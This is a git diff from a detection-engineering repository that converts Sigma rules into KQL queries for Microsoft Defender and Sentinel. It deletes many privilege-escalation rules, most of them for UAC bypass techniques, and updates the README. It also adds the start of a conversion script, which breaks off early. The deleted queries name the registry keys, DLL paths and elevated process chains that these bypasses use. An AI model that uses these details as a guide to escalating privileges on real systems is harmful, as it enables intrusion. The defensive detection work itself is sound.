--- a/Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\" /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql b/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Privilege Escalation/UAC_Bypass_Via_Wsreset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_WSReset.kql b/Privilege Escalation/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
--- a/Privilege Escalation/UAC_Bypass_WSReset.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql b/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql b/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql b/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql b/Privilege Escalation/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Sdclt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql b/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
deleted file mode 100644
index dce3946b..00000000
--- a/Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in
-// Tags: attack.privilege_escalation, attack.t1548
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "WF.msc" and InitiatingProcessFolderPath endswith "\\mmc.exe") and (not(FolderPath endswith "\\WerFault.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Disabled.kql b/Privilege Escalation/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Privilege Escalation/UAC_Disabled.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Notification_Disabled.kql b/Privilege Escalation/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Privilege Escalation/UAC_Notification_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql b/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql b/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql b/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: medium
-// Description: Detects WMI script event consumers
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.003
-DeviceProcessEvents
-| where FolderPath =~ "C:\\WINDOWS\\system32\\wbem\\scrcons.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql b/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql b/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
deleted file mode 100644
index 1742c500..00000000
--- a/Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects execution of the Windows Kernel Debugger "kd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
deleted file mode 100644
index e0568272..00000000
--- a/Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021/06/29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527 -DeviceImageLoadEvents -| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/README.md b/README.md index 0cfa7def..f9bf000a 100644 --- a/README.md +++ b/README.md 
@@ -1,68 +1,104 @@ -# Sigma2KQL -Sigma Queries turned into KQL for Defender using [pysigma-backend-microsoft365defender](https://github.com/AttackIQ/pySigma-backend-microsoft365defender/tree/main) - -Reproducible Example: -```python -!git clone https://github.com/SigmaHQ/sigma.git -!pip install pysigma-backend-microsoft365defender -import os, glob -path = 'sigma/rules/*/' -file_pattern = os.path.join(path,'*.yml') -file_list_a = glob.glob(file_pattern) - -import yaml - -def convert_to_string(yaml_dict): - # We change default style of strings to None (it's '>' in PyYAML) - # This means that PyYAML will choose style based on the data - yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str - def repr_str(dumper, data): - if '\n' in data: - return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') - return dumper.org_represent_str(data) - yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper) - - yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper) - return yaml_str - -from sigma.rule import SigmaRule -from sigma.backends.microsoft365defender import Microsoft365DefenderBackend -from sigma.pipelines.microsoft365defender import microsoft_365_defender_pipeline - - -for yml in detections_yml_paths: - with open(yml) as yaml_file: - try: - yaml_contents = load(yaml_file, Loader=SafeLoader) - # Define an example rule as a YAML str - sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents)) - # Create backend, which automatically adds the pipeline - m365def_backend = Microsoft365DefenderBackend() - - # Or apply the pipeline manually - pipeline = microsoft_365_defender_pipeline() - pipeline.apply(sigma_rule) - - # Convert the rule - print(sigma_rule.title + " KQL Query: \n") - kql_query = m365def_backend.convert_rule(sigma_rule)[0] - print(kql_query) - print("\n \n ") - - # Write the KQL query to a .kql file - with open('/KQL/'+sigma_rule.title.replace(' ', '_') + '.kql', 'w') as kql_file: - # Write metadata 
as comments - kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n') - kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') - kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') - kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n') - # Here it's assumed that 'tags' is a list - tags = yaml_contents.get("tags", []) - kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') - # Write the actual KQL query - kql_file.write(kql_query) - - except: - print(sigma_rule.title + " KQL Query: \n") - print('SigmaTransformationError: Rule category not yet supported by the Microsoft 365 Defender Sigma backend.') +# Sigma2KQL - Working as of 15/11/2025 +Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) + +``` +├───rules +│ └───KQL +│ ├───Collection +│ ├───Command and Control +│ ├───Credential Access +│ ├───Defense Evasion +│ ├───Discovery +│ ├───Execution +│ ├───Exfiltration +│ ├───Impact +│ ├───Initial Access +│ ├───Lateral Movement +│ ├───Persistence +│ ├───Privilege Escalation +│ ├───Reconnaissance +│ └───Resource Development +├───rules-emerging-threats +│ └───KQL +└───rules-threat-hunting + └───KQL +``` + +## How do I use the helper to do this locally or in a Detection as Code pipeline? + +I've included a pip freeze of required librararies and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. 
+ +### Run the following commands to get started: + +**Clone the sigma rules repository:** + +``` +git clone https://github.com/SigmaHQ/sigma.git +``` + +``` +python -m venv .venv +``` + +**With Windows:** +``` +.\.venv\Scripts\Activate.ps1 +``` + +**With Linux** +``` +./.venv/bin/activate +``` +**Once in your Python virtual env:** + +``` +pip install -r requirements.txt +``` + +**Then you can use the script like this:** + ``` +..\.venv\Scripts\python.exe .\helper.py --sigma-dir "C:/Users/Kaiber/sigma" --output-dir "C:/Users/Kaiber/Sigma2KQL-2025/KQL" +``` + +### Sample Rule Summary: + +``` +rules-threat-hunting Summary: + Successful: 96 + Failed: 33 + Tactics covered: 13 + +================================================================================ +OVERALL CONVERSION COMPLETE! +================================================================================ +Total files processed: 3637 +Total successful conversions: 2225 +Total failed conversions: 1412 + +Output base directory: D:\Projects\SigmaTerraform\Sigma2KQL-2025\KQL + +Folder structure created: + rules/ + rules-emerging-threats/ + rules-threat-hunting/ +``` + +### Sample Rule: + +``` +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. 
+// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) +``` + diff --git a/helper.py b/helper.py new file mode 100644 index 00000000..d2bce32f --- /dev/null +++ b/helper.py 
@@ -0,0 +1,237 @@
+"""Helper script for converting sigma rules to kql for Microsoft Sentinel and Defender XDR."""
+import os
+import glob
+import argparse
+import yaml
+from yaml import load, SafeLoader
+from sigma.rule import SigmaRule
+from sigma.backends.kusto import KustoBackend
+from sigma.pipelines.microsoftxdr import microsoft_xdr_pipeline
+
+# Parse command-line arguments
+parser = argparse.ArgumentParser(
+    description='Convert Sigma rules to KQL queries for Microsoft Sentinel and Defender XDR',
+    formatter_class=argparse.RawDescriptionHelpFormatter,
+    epilog="""
+Examples:
+    python helper.py
+    python helper.py --sigma-dir ./sigma --output-dir ./output
